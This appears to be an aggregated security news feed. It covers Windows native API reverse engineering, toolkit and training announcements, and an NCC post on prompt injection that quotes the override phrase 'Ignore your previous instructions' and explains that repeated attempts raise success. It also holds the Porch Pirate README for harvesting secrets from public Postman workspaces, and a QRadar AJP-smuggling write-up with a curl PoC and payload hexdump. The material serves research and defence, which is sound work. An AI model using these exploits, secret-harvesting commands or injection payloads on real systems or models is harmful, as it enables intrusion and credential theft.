The native API is used early in the Windows startup process when other components or APIs are not available yet. Therefore, a few Windows components, such as the Client/Server Runtime Subsystem (CSRSS), are implemented using the native API. The native API is also used by subroutines in Kernel32.DLL and others to implement the Windows API, on which most Windows components are built.

The native API contains several functions, including C runtime functions that are needed for very basic C runtime execution, such as strlen(); however, it lacks some other common functions or procedures such as malloc(), printf(), and scanf(). The reason is that malloc() does not specify which heap to use for memory allocation, and printf() and scanf() use a console, which can be accessed only through Kernel32.

Native API Naming Convention

Most of the native APIs have a prefix such as Nt, Zw, or Rtl. All the native APIs that start with Nt or Zw are system calls, declared in both ntoskrnl.exe and ntdll.dll, and they are identical when called from NTDLL.

  • Nt or Zw: When called from user mode (NTDLL), these execute an interrupt into kernel mode and call the equivalent function in ntoskrnl.exe via the SSDT. The only difference is that the Zw APIs ensure kernel mode when called from ntoskrnl.exe, while the Nt APIs don't.[1]
  • Rtl: This is the second largest group of NTDLL calls. It contains the (extended) C run-time library, which includes many utility functions that can be used by native applications but don't have direct kernel support.
  • Csr: These are client-server functions used to communicate with the Win32 subsystem process, csrss.exe.
  • Dbg: These are debugging functions, such as a software breakpoint.
  • Ki: These are upcalls from kernel mode for events like APC dispatching.
  • Ldr: These are loader functions for Portable Executable (PE) files, responsible for handling and starting new processes.
  • Tp: These are for thread pool handling.

Figuring Out Undocumented APIs

Some of these APIs, the ones that are part of the Windows Driver Kit (WDK), are documented, but Microsoft does not provide documentation for the rest of the native APIs. So, how can we find the definitions of these APIs? How do we know what arguments we need to provide?

As we discussed earlier, these native APIs are defined in ntdll.dll and ntoskrnl.exe. Let's open them in Ghidra and see if we can find the definition of one of the native APIs, NtQueryInformationProcess().

Let's load NTDLL in Ghidra, analyse it, and check the exported functions under the Symbol Tree:

Well, the function signature doesn't look good. It looks like this API call does not accept any parameters (void)? That can't be true, because it needs to take at least a handle to a target process.

Now, let's load ntoskrnl.exe in Ghidra and check it there.

Okay, that's a little bit better. We now at least know that it takes five arguments. But what are those arguments? Can we figure them out? Well, at least for this native API, I found its definition on MSDN here. But what if it wasn't there? Could we still figure out the number of parameters and their data types required to call this native API?

Let's see if we can find a header file in the Includes directory of the Windows Kits (WinDBG) installation directory.

As you can see, the grep command shows the NtQueryInformationProcess() is found in two files, but the definition is found only in winternl.h.

At last, we found the function declaration! So, now we know that it takes three input arguments (IN) and returns values through two output parameters (OUT), ReturnLength and ProcessInformation.
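For reference, the declaration found in winternl.h boils down to the following (paraphrased; the SAL annotations in the actual header mark which parameters are IN and which are OUT):

// Paraphrased from winternl.h / the MSDN page for NtQueryInformationProcess.
NTSTATUS NtQueryInformationProcess(
    HANDLE           ProcessHandle,            // IN:  handle to the target process
    PROCESSINFOCLASS ProcessInformationClass,  // IN:  which information class to query
    PVOID            ProcessInformation,       // OUT: caller-supplied buffer
    ULONG            ProcessInformationLength, // IN:  size of that buffer in bytes
    PULONG           ReturnLength              // OUT: bytes written or required
);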

Similarly, another native API, NtOpenProcess(), is not defined in ntoskrnl.exe, but its declaration can be found in the Windows driver header file ntddk.h.

Note that not all native APIs have function declarations in user-mode or kernel-mode header files, and, if I am not wrong, people may have figured them out via live debugging (dynamic analysis) and/or reverse engineering.

System Service Descriptor Table (SSDT)

The Windows kernel handles system calls via the SSDT. Before invoking a SysCall, the SysCall number is placed into the EAX register (RAX on 64-bit systems). The kernel then checks the KiServiceTable in its address space for this SysCall number.

For example, the SysCall number for NtOpenProcess() is 0x26. We can check this table by launching WinDBG in local kernel debug mode and using the dd nt!KiServiceTable command.

It displays a list of offsets to actual system calls, such as NtOpenProcess(). We can check the SysCall number for NtOpenProcess() by making the dd command display the 0x27th entry from the start of the table (it's 0x26, but the table index starts at 0).

As you can see, adding L27 to the dd nt!KiServiceTable command displays the offsets for up to 0x26 SysCalls in this table. We can now check if offset 05f2190 resolves to NtOpenProcess(). We can ignore the last nibble of this offset, 0. This nibble indicates how many stack parameters need to be cleaned up after the SysCall.

The first four parameters are usually passed in registers, and the remaining ones are pushed onto the stack. With just one nibble to represent the number of parameters that can go onto the stack, we can represent a maximum of 0xf parameters.

So in the case of NtOpenProcess, there are no parameters on the stack that need to be cleaned up. Now let's unassemble the instructions at nt!KiServiceTable + 05f2190 to see if this address resolves to the SysCall NtOpenProcess().

References / To Do

https://en.wikipedia.org/wiki/Windows_Native_API

https://web.archive.org/web/20110119043027/http://www.codeproject.com/KB/system/Win32.aspx

https://web.archive.org/web/20070403035347/http://support.microsoft.com/kb/187674

https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

https://learn.microsoft.com/en-us/windows/win32/api/

https://techcommunity.microsoft.com/t5/windows-blog-archive/pushing-the-limits-of-windows-processes-and-threads/ba-p/723824

Windows Device Driver Documentation: https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/_kernel/

Process Info, PEB and TEB etc: https://www.codeproject.com/Articles/19685/Get-Process-Info-with-NtQueryInformationProcess

https://www.microsoftpressstore.com/articles/article.aspx?p=2233328

Offensive Windows Attack Techniques: https://attack.mitre.org/techniques/enterprise/

https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/exploring-process-environment-block

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Masquerade-PEB.ps1

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

Windows Drivers Reverse Engineering Methodology


Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

By: Zion3R
14 April 2024 at 21:24


This tool compilation is carefully crafted to be useful both for beginners and veterans of the malware analysis world. It has also proven useful for people trying their luck in the cracking underworld.

It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


Advantages

To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

  1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

  2. The pack is integrated with a Universal Updater made by us from scratch. Thanks to that, we get to maintain all the tools in an automated fashion.

  3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use into the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

  4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

Installation

  1. You can simply download the stable versions from the release section, where you can also find the installer.

  2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
    You will find the binary in the folder bin\updater\updater.exe.

Tool set

This toolkit is composed of 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from its original/official website, but we still recommend using them with caution, especially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.

About contributions

Pull Requests are welcome. If you want to propose big changes, you should first create an Issue about it, so we can all analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



The A in CTI Stands for Actionable

13 April 2024 at 18:43
Cyber Threat Intelligence (CTI) is about communicating the latest information on threat actors and incidents to organizations in a timely manner. Analysis in these areas allows an organization to maintain situational awareness of the current threat landscape, organizational impacts, and threat actor motives. The level of information that needs to be conveyed depends on the specific teams within CTI, as the required level of granularity depends on whom you're speaking to.

Public Report - Confidential Mode for Hyperdisk - DEK Protection Analysis

12 April 2024 at 19:00

During the spring of 2024, Google engaged NCC Group to conduct a design review of the Confidential Mode for Hyperdisk (CHD) architecture in order to analyze how the Data Encryption Key (DEK) that encrypts data-at-rest is protected. The project was 10 person-days, and the goal was to validate that the following two properties are enforced:

  • The DEK is not available in an unencrypted form in CHD infrastructure.
  • It is not possible to persist and/or extract an unencrypted DEK from the secure hardware-protected enclaves.

The two secure hardware-backed enclaves where the DEK is allowed to exist in plaintext are:

  • Key Management System HSM - during CHD creation (DEK is generated and exported wrapped) and DEK Installation (DEK is imported and unwrapped)
  • Infrastructure Node AMD SEV-ES Secure Enclave - during CHD access to storage node (DEK is used to process the data read/write operations)

NCC Group evaluated Confidential Mode for Hyperdisk - specifically, the secure handling of Data Encryption Keys across all disk operations including:

  • disk provisioning
  • mounting
  • data read/write operations

The public report for this review may be downloaded below:

Communication Skills in Cybersecurity

By: OffSec
12 April 2024 at 17:09

This blog is based on a conversation we had with Eugene Lim. Eugene is a Senior Cybersecurity Engineer who has earned the OSCP, OSCE3, and OSEE certifications. Follow him on X @spaceraccoonsec and learn about infosec and white hat hacking from his blog.


The significance of communication skills in cybersecurity often goes unnoticed, eclipsed by the technical acumen required to be a successful cybersecurity practitioner. We discussed the topic of communication skills in cybersecurity with Eugene Lim, a Senior Cybersecurity Engineer who holds the OSCP, OSCE3, and OSEE certifications. He shared a series of insights about how effective communication is not just a supplementary skill but a fundamental necessity.

... Read more »

The post Communication Skills in Cybersecurity appeared first on OffSec.

Non-Deterministic Nature of Prompt Injection

12 April 2024 at 15:19

As we explained in a previous blogpost, exploiting a prompt injection attack is conceptually easy to understand: There are previous instructions in the prompt, and we include additional instructions within the user input, which is merged together with the legitimate instructions in a way that the underlying model cannot distinguish between them. Just like what happens with SQL Injection. "Ignore your previous instructions and..." is the new " AND 1=0 UNION ..." in the post-LLM world, right? Well... kind of, but not that much. The big difference between the two is that an SQL database is a deterministic engine, whereas an LLM in general is not (except in certain specific configurations), and this makes a big difference in how we identify and exploit injection vulnerabilities.

When detecting an SQL Injection, we build payloads that include SQL instructions and observe the response to learn more about the injected SQL statement and the database structure. From those responses we can also identify if the injection vulnerability exists, as a vulnerable application would respond differently than expected.

However, detecting a prompt injection vulnerability introduces an additional layer of complexity due to the non-deterministic nature of most LLM setups. Let's imagine we are trying to identify a prompt injection vulnerability in an application using the following prompt (shown in OpenAI's Playground for simplicity):

Example of failing prompt injection exploitation.

In this example, "System" refers to the instructions within the prompt that are invisible and immutable to users; "User" represents the user input, and "Assistant" denotes the LLM's response. Clearly, the user input exploits a prompt injection vulnerability by incorporating additional instructions that supersede the original ones, compelling the application to invariably respond with "Secure." However, this payload fails to work as anticipated because the application responds with "Insecure" instead of the expected "Secure," indicating unsuccessful prompt injection exploitation. Viewing this behavior through a traditional SQLi lens, one might conclude the application is effectively shielded against prompt injection. But what happens if we repeat the same user input multiple times?

Example of successful prompt injection exploitation.

In a previous blogpost, we explained that the output of an LLM is essentially the score assigned to each potential token from the vocabulary, determining the next generated token. Subsequently, various parameters, including "temperature" and beam size, are employed to select the next generated token. Some of these parameters involve non-deterministic processes, resulting in the model not always producing the same output for the same input.

Slide of a presentation showing how the next character is chosen under the hood.

This non-deterministic behavior influences how a model responds to inputs that include a prompt injection payload, as illustrated in the example above. Similar behavior might be observed if you have experimented with LLM CTFs, wherein a payload effective for a friend does not appear to work for you. It is likely not a case of your friend cheating; instead, they might just be luckier. Repeating the payload several times might eventually lead to success.

Another factor where the exploitation of prompt injection differs significantly from SQLi exploitation is that of LLM hallucinations. It is not uncommon for a response from an LLM to include a hallucination that may deceive one into believing an injection was successful or had more of an impact than it actually did. Examples include receiving an invented list of previous instructions or expanding on something that the attacker suggested but does not actually exist.

Consequently, identifying prompt injection vulnerabilities should involve repeating the same payloads or minor variations thereof multiple times, followed by verifying the success of any attempt. Therefore, it is crucial to consult with your security vendor about the maximum number of connections they can utilize and how the model is configured to yield deterministic responses. The less deterministic the model and the fewer connections the target service permits, the more time will be needed to achieve comprehensive coverage. If the prompt template and instructions are available, it aids in pinpointing hallucinations and other similar behaviors, which lead to false positives.

Acknowledgements

Special thanks to Thomas Atkinson and the rest of the NCC Group team that proofread this blogpost before it was published.

Vulnerability Assessment Course – Summer 2024

12 April 2024 at 14:31

This course introduces vulnerability analysis and research with a focus on Ndays. We start with understanding security risks and discuss industry-standard metrics such as CVSS, CWE, and MITRE ATT&CK. Next, we explore what a detailed analysis of a CVE contains, including vulnerability types, attack vectors, source and binary code analysis, exploitation, and detection and mitigation guidance. In particular, we shall discuss how the efficacy of high-fidelity detection schemes is predicated on gaining a thorough understanding of the vulnerability and exploitation avenues.

Next, we look at the basics of reversing by introducing tools such as debuggers and disassemblers. We look at various bug classes and talk about determining risk just from the title and metadata of a CVE. It will be noted that predicting the severity and exploitability of a vulnerability requires knowledge about the common bug classes and exploitation techniques. To this end, we shall perform deep-dive analyses of a few CVEs that cover different bug classes such as command injection, insecure deserialization, SQL injection, stack- and heap buffer overflows, and other memory corruption vulnerabilities.

Towards the end of the training, the attendee can expect to have gained familiarity with several vulnerability types and research tools, and to be aware of the utility and limitations of detection schemes.


Emphasis

To prepare the student to fully defend the modern enterprise by being aware and equipped to assess the impact of vulnerabilities across the breadth of the application space.


Prerequisites

  • Computer with the ability to run virtual machines (16GB+ memory recommended)
  • Some familiarity with debuggers, Python, C/C++, x86 ASM. IDA Pro or Ghidra experience a plus.

No prior vulnerability discovery experience is necessary.


Course Information

Attendance will be limited to 25 students per course.

Cost: $4000 USD per attendee

Dates: July 9 – 12, 2024

Location: Washington, D.C.


Syllabus

Vulnerability and risk assessment

  • N-day risk and patching timelines
  • Vulnerability terminology: CVE, CVSS, CWE, MITRE ATT&CK, Impact, Category
  • Risk assessment
  • Vulnerability mitigation

Binary and code analysis

  • Reverse engineering tools such as debuggers, disassemblers
  • Deep dive into command injection, SQL injection, and insecure deserialization with case studies and hands-on practicals.
  • Deep dive into buffer overflows and other memory corruption vulnerabilities with case studies and hands-on practicals.

Analysis Enrichment

  • Qualitative risk assessment
  • Patch analysis
  • Understanding mitigation techniques
  • Writing detection guidance

The post Vulnerability Assessment Course – Summer 2024 appeared first on Exodus Intelligence.

Public Mobile Exploitation Training – Summer 2024

12 April 2024 at 13:55

This 4 day course is designed to provide students with both an overview of the Android attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, binary instrumentation, and advanced exploitation of widely deployed mobile platforms.

Taught by Senior members of the Exodus Intelligence Mobile Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands-on with privilege escalation techniques within the Android kernel, mitigations, and execution migration issues, with a focus on MediaTek chipsets.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64, recommended 8GB+ memory)
  • Some familiarity with: IDA Pro, Python, C/C++.
  • ARM assembly fluency strongly recommended.
  • Installed and usable copy of IDA Pro 6.1+, VirtualBox, Python.

Course Information

Attendance will be limited to 12 students per course.

Cost: $5000 USD per attendee

Dates: July 15 – 18, 2024

Location: Washington, D.C.


Syllabus

Android Kernel

  • Process Management
    • Important structures
    • Memory Management
  • Kernel Synchronization
  • Memory Management
    • Virtual memory
    • Memory allocators
  • Debugging Environment
    • Build the kernel
    • Boot and Root the kernel
    • Kernel debugging
  • Samsung Knox/RKP
  • SELinux
  • Type of kernel vulnerabilities
    • Exploitation primitives
    • Kernel vulnerabilities overview
    • Heap overflows, use-after-free, info leakage
  • Double-free vulnerability (radio)
    • Exploitation – convert the double free into a use-after-free of a struct page
  • Double-free vulnerability (untrusted_app)
    • Vulnerability overview
    • Technique 1: type confusion to obtain write access to globally shared memory
    • Technique 2: UaF that can lead to arbitrary RW in kernel memory

Mediatek / Exynos baseband

  • Introduction
    • Exynos baseband overview
    • Mediatek baseband overview
  • Environment
  • Previous research
  • Analysis of the modem
  • Emulation / Fuzzing
  • Rogue base station
  • Secure boot
  • Mediatek boot rom vulnerability
    • Vulnerability overview
    • Exploitation
    • Using brom exploit to patch the tee
  • Baseband debugger
    • Write the modem physical memory from EL1

The post Public Mobile Exploitation Training – Summer 2024 appeared first on Exodus Intelligence.

Public Browser Exploitation Training – Summer 2024

12 April 2024 at 13:54

This 4 day course is designed to provide students with both an overview of the current state of the browser attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, and advanced exploitation of widely deployed browsers such as Google Chrome.

Taught by Senior members of the Exodus Intelligence Browser Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands-on with privilege escalation techniques within JavaScript implementations, JIT optimizers, and rendering components.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64, recommended 8GB+ memory)
  • Prior experience in vulnerability research, but not necessarily with browsers.

Course Information

Attendance will be limited to 18 students per course.

Cost: $5000 USD per attendee

Dates: July 15 – 18, 2024

Location: Washington, D.C.


Syllabus

  • JavaScript Crash Course
  • Browsers Overview
    • Architecture
    • Renderer
    • Sandbox
  • Deep Dive into JavaScript Engines and JIT Compilation
    • Detailed understanding of JavaScript engines and JIT compilation
    • Differences between major JavaScript engines (V8, SpiderMonkey, JavaScriptCore)
  • Introduction to Browser Exploitation
    • Technical aspects and techniques of browser exploitation
    • Focus on JavaScript engine and JIT vulnerabilities
  • Chrome ArrayShift case study
  • JIT Compilers in depth
    • Chrome/V8 Turbofan
    • Firefox/SpiderMonkey Ion
    • Safari/JavaScriptCore DFG/FTL
  • Types of Arrays
  • v8 case study
    • Object in-memory layout
    • Garbage collection
  • Running shellcode
    • Common avenues
    • Mitigations
  • Browser Fuzzing and Bug Hunting
    • Introduction to fuzzing
    • Pros and cons of fuzzing
    • Fuzzing techniques for browsers
    • β€œSmarter” fuzzing
  • Current landscape
  • Hands-on exercises throughout the course
    • Understanding the environment and getting up to speed
    • Analysis and exploitation of a vulnerability

The post Public Browser Exploitation Training – Summer 2024 appeared first on Exodus Intelligence.

Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R
12 April 2024 at 12:30


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration for recon beyond secrets. We realized we required capabilities that were "secret-agnostic" and that had enough flexibility to capture false positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to conduct nearly complete reviews of public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

import json

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


IBM QRadar - When The Attacker Controls Your Security Stack (CVE-2022-26377)

By: Sonny
12 April 2024 at 08:27

Welcome to April 2024.

A depressing year so far - we've seen critical vulnerabilities across a wide range of enterprise software stacks.

In addition, we've seen surreptitious and patient threat actors light our industry on fire with slowly introduced backdoors in the XZ library.

Today, in this iteration of 'watchTowr Labs takes aim at yet another piece of software' we wonder why the industry panics about backdoors in libraries that have taken 2 years to be unsuccessfully introduced - while security vendors like IBM can't even update libraries used in their flagship security products that subsequently allow for trivial exploitation.


Over the last few weeks, we've watched the furor and speculation run rife on Twitter and LinkedIn;

  • Who wrote the XZ backdoor?
  • Which APT group was it?
  • Which country do we blame?
  • Could it happen again?

We sat back and watched the industry discuss how they would solve future iterations of the XZ backdoor - presumably in some sort of parallel universe - because in the one we currently exist in, IBM - a key security vendor - could not even update a dependency in its flagship security software to keep it secure.

Seriously, what are we doing?

Anyway, we're back at it - sit back, enjoy the mayhem - and join us on this journey into IBM's QRadar.

What is QRadar?

For the uninitiated on Big Blue, or those who have simply been spared the numerous traumatic experiences of ever having to configure a SIEM - as mentioned above, QRadar is IBM's crown-jewel, flagship security product.

For those unfamiliar with defensive security products, QRadar is the mastermind application that can sit on-premise or in the cloud via IBM's SaaS offering. Quite simply, it's IBM's Security Information and Event Management (SIEM) product - and is the heart of many enterprise's security software stack.

A SIEM solution is a centralised system for monitoring logs ingested from all sorts of endpoints (for example: employee laptops, servers, IoT devices, or cloud environments). These logs are analysed using a defined ruleset to detect potential security incidents.

Has a web shell been deployed to an application server? Has a Powershell process been spawned on the marketing teams' laptops? Is your Domain Controller communicating with Pastebin? SIEMs ingest and analyse alerts, data, and telemetry - and provide feedback alerts to a Blue Team operator to inform them of potential security events.

Should a threat actor manage to compromise a SIEM in an enterprise environment, they'd be able to "look down all the CCTV cameras in the warehouse," so to speak.

With the ability to manipulate records of potential security incidents or to view logs (which all too often contain cleartext credentials) and session data, it is clear how this access permits an attacker to cripple security team capabilities within an organisation.

Obtaining a license for QRadar costs thousands of dollars, but fortunately for us, QRadar is available for download as an on-premise installation in the form of AWS AMIs (BYOL) and a free Community Edition virtual machine.

Typically, QRadar is deployed within an organisation's internal environment - as you'd expect for the management console of a security product - but a brief internet search reveals that thousands of IBM's customers had "better ideas".

When first reviewing any application for security deficiencies, the first step is to enumerate the routes available. The question posed: where can we, as pre-authenticated users, touch the appliance and interact with its underlying code?

We're not exaggerating when we state that a deployment of IBM's QRadar is a behemoth of a solution to analyse - to give some statistics of the available routes amongst the thousands of files, we found a number of paths to explore:

  • 5 .war Files
    • Containing 70+ Servlets
  • 468 JSP files
  • 255 PHP Files
  • 6+ reverse ProxyPass rules
  • Seemingly infinite defined APIs (as we'd expect for a SIEM)

Each route takes time to meticulously review to establish its purpose (and functionality, intentional or otherwise).

Our first encounter with QRadar was back in October of 2023; we spent a number of weeks diving into each route available, extracting the required parameters, and following each of their functions to look for potential security vulnerabilities.

To give some initial context on QRadar, the core application is accessed via HTTPS over port 443, which redirects to the endpoint /console . When reviewing the Apache config that handles this, we can see this is filtered through a ProxyPass rule over the ajp:// protocol to an internal service running on port 8009:

ProxyPass /console/ ajp://localhost:8009/console/

For those new to AJP (Apache JServ Protocol), it is a binary-like protocol for interacting with Java applications instead of a human-readable protocol like HTTP. It is harder for humans to read, but it has similarities, such as parameters and headers.

In the context of QRadar, users typically don't have direct access to the AJP protocol. Instead, they access it indirectly, sending an HTTP request to the /console URI. Anything after this /console endpoint is translated from an HTTP request to an AJP binary packet, which is then actioned by the Java code of the application.
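To make the 'binary, but still header-and-parameter shaped' nature of AJP a little more concrete, here is a minimal Python sketch of how a single AJP string value is encoded (a two-byte big-endian length, the raw bytes, then a null terminator). This is only meant to show why the packets in the hexdumps below look the way they do, not to reproduce a full forward-request packet.

import struct

def ajp_string(value: str) -> bytes:
    # AJP encodes strings as a 2-byte big-endian length, the bytes themselves, then a 0x00 terminator.
    data = value.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"

print(ajp_string("/console/").hex())  # 00092f636f6e736f6c652f00

The request URI, headers, and attributes seen in the payloads later in this post are all built from this primitive.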

FWIW, it's considered bad security practice to allow direct access to the AJP protocol, and with good reason - you only have to look at the infamous GhostCat vulnerability, which allowed Local File Read and, on some occasions, Remote Code Execution, for an example of what can go wrong when it is exposed to malicious traffic.

Below is an example viewed within WireShark that shows a single HTTP request to a /console endpoint. We can see that this results in a single AJP packet being issued. It’s important to note, for later on, the β€˜one request to one packet’ ratio - every HTTP request results in exactly one set of AJP packets.

[Wireshark capture: a single HTTP request to /console resulting in exactly one AJP packet]

While the majority of servlets and .jsp endpoints reside within the console.war file, these can’t be accessed from a pre-authenticated perspective. As readers will imagine - this is no bueno.

Sadly, in our first encounter - we came up short. The reality of research is that this happens, but as anyone who is jaded enough by computers and research will know - we kept meticulous notes, including a Software Bill of Materials (SBOM), in case we needed to come back.

It's a new dawn, it's a new day, it's a new life

Before getting into our current efforts here in 2024, let's discuss something that was brought to light back in 2022 - a then-new class of vulnerability defined as "AJP Smuggling".

A researcher known as "RicterZ" released their insight into, and a PoC for, an AJP smuggling vulnerability (CVE-2022-26377), which, in short, demonstrates that it is possible to smuggle an AJP packet via an HTTP request containing the header Transfer-Encoding: chunked, chunked, with the request body containing the binary format of the AJP packet. This smuggled AJP request is passed directly to the AJP protocol port should a corresponding Apache ProxyPass rule have been configured.

This was deemed a vulnerability in mod_proxy_ajp, and the assigned CVE is accompanied by the following description:

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.

The impact of this vulnerability was mostly theoretical until a real-world example came to our attention at the start of 2024. This example came in the form of CVE-2023-46747, a compromise of BigIP’s F5 product, achieved using the same AJP smuggling technique.

Here, researchers leveraged the original vulnerability, as documented by RicterZ. This allowed a request to be smuggled to the AJP protocol's backend, exposing a new attack surface of previously-restricted functionality. This previously-restricted but now-available functionality allowed an unauthenticated attacker to add a new administrative account to an F5 BigIP device.

Having familiarised ourselves with both the aforementioned F5 BigIP vulnerability and RicterZ’s work, we set out to reboot our QRadar instance to see if our new knowledge was relevant to its implementation of AJP in the console application.

A quick version check of the deployed httpd binary tells us we're up against Apache 2.4.6, which falls well within the supposedly vulnerable range of Apache versions that contained a vulnerable mod_proxy_ajp.

As anyone that has ever exploited anything actually knows - version numbers are at best false advertising, and thus - frankly - we ignored this. Also, fortunately for us, in the context of the IBM QRadar deployment of Apache, the module proxy_ajp_module is loaded.

[ec2-user@ip-172-31-24-208 tmp]$ httpd -v
Server version: Apache/2.4.6 (Red Hat Enterprise Linux)
Server built:   Apr 21 2020 10:19:09

[ec2-user@ip-172-31-24-208 modules]$ sudo httpd -M | grep proxy_ajp_module
proxy_ajp_module (shared)

To conduct a quick litmus test of whether or not QRadar is vulnerable to CVE-2022-26377, we followed along with RicterZ's research and tried the PoC, which comes in the form of a curl invocation intended to retrieve the web.xml file of the ROOT war file to prove exploitability.

The curl PoC can be broken down into two parts:

  • Transfer-Encoding header with the β€œchunked, chunked” value,
  • A raw AJP packet in binary format within the request’s body, stored here in the file pay.txt.
curl -k -i https://<qradar-host>/console/ -H 'Transfer-Encoding: chunked, chunked' \
		--data-binary @pay.txt
00000000: 0008 4854 5450 2f31 2e31 0000 012f 0000  ..HTTP/1.1.../..
00000010: 0931 3237 2e30 2e30 2e31 00ff ff00 0161  .127.0.0.1.....a
00000020: 0000 5000 0000 0a00 216a 6176 6178 2e73  ..P.....!javax.s
00000030: 6572 766c 6574 2e69 6e63 6c75 6465 2e72  ervlet.include.r
00000040: 6571 7565 7374 5f75 7269 0000 012f 000a  equest_uri.../..
00000050: 0022 6a61 7661 782e 7365 7276 6c65 742e  ."javax.servlet.
00000060: 696e 636c 7564 652e 7365 7276 6c65 745f  include.servlet_
00000070: 7061 7468 0001 532f 2f2f 2f2f 2f2f 2f2f  path..S/////////
00000080: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000090: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000a0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
